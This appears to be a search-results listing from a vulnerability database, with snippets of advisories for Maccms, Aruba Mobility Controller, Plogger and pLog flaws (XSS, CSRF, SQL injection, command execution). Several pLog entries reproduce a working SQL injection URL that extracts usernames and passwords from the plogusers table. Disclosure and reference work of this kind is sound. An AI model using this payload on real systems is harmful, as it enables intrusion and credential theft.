15 matches found
CVE-2022-27884
Maccms v10 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in /admin.php/admin/plog/index.html via the wd parameter...
CVE-2022-27884
CVE-2022-27884 affects Maccms v10 and is a reflected cross-site scripting (XSS) vulnerability in the admin interface, specifically in /admin.php/admin/plog/index.html via the wd parameter. The root cause is insufficient input validation/escaping of user-supplied data in that parameter, enabling i...
Maccms Cross-Site Scripting Vulnerability
Maccms is a PHP-based content management system (CMS) for film and television. Version v10 of Maccms contains a cross-site scripting vulnerability, which originates from the lack of validation and filtering of user-supplied data and output data for the wd parameter in /admin.php/admin/plog/index.html, whic...
Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities
Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities Date: 08/016/2015 Author: Itzik Chen Product web page: http://www.arubanetworks.com Affected Version: 6.4.2.8 Tested on: Aruba7240, Ver 6.2.4.8 Summary ================ Aruba Networks is an HP company, one of the leaders in enterprise...
Plogger 3.0 - SQL Injection
GulfTech Security Research August 05, 2008 Vendor : Mike Johnson URL : http://www.plogger.org/ Version : Plogger addfile$filecontents, $row"path";...
pLog (albumId) Remote SQL Injection Vulnerability
No description provided by source. pLog albumId Remote Sql nj. DreamTurk / [email protected] Down : http://drupal.org/project/pblog http://localhost/index.php?op=ViewAlbum&albumId=-1//union//select//0,1,user,password,4,5,6,7,8 from plogusers/&blogId=1 4ever sqL L0v3r'Z Crew 2008 http://coderx.o...
plog-sql.txt
pLog albumId Remote Sql İnj. DreamTurk / [email protected] Down : http://drupal.org/project/pblog http://localhost/index.php?op=ViewAlbum&albumId=-1//union//select//0,1,user,password,4,5,6,7,8 from plogusers/&blogId=1 4ever sqL L0v3r'Z Crew 2008 http://coderx.org Greatz : Cr@zyKing & BLasTer &...
pLog (albumId) Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications ================================================= pLog albumId Remote SQL Injection Vulnerability ================================================= pLog albumId Remote Sql Inj...
PLog 1.0.6 - albumID SQL Injection
PLog 1.0.6 - albumID SQL Injection pLog albumId Remote Sql İnj. DreamTurk / [email protected] Down : http://sourceforge.net/project/showfiles.php?groupid=83964&packageid=86556 http://localhost/index.php?op=ViewAlbum&albumId=-1//union//select//0,1,user,password,4,5,6,7,8 from plogusers/&blogId=...
Plogger exploit method! - Vulnerability warning-the black bar safety net
http://www.hackeroo.com/ Plogger is a PHP-based weblog program. Plogger does not filter user-submitted URI data, and exploiting the vulnerability allows arbitrary commands to be executed with WEB permissions. The vulnerability is in the 'plog-admin-functions.php' script, where the user-submitted 'configbasedir' parameter is no...
pLog register.php Multiple Parameter XSS
The remote host is running pLog, a blogging system written in PHP. The remote version of this software does not perform a proper validation of user-supplied input and is, therefore, vulnerable to a cross-site scripting attack. To exploit this flaw, an attacker would need to use the script...
[Full-Disclosure] Code Injection Vulnerability in pLog
I believe I have discovered a vulnerability in the open source blog software known as pLog. Register.php doesn't seem to check for script tags in the username or blog name fields in the account sign up form. This allows injection of potentially malicious code into the page. Since the names of blo...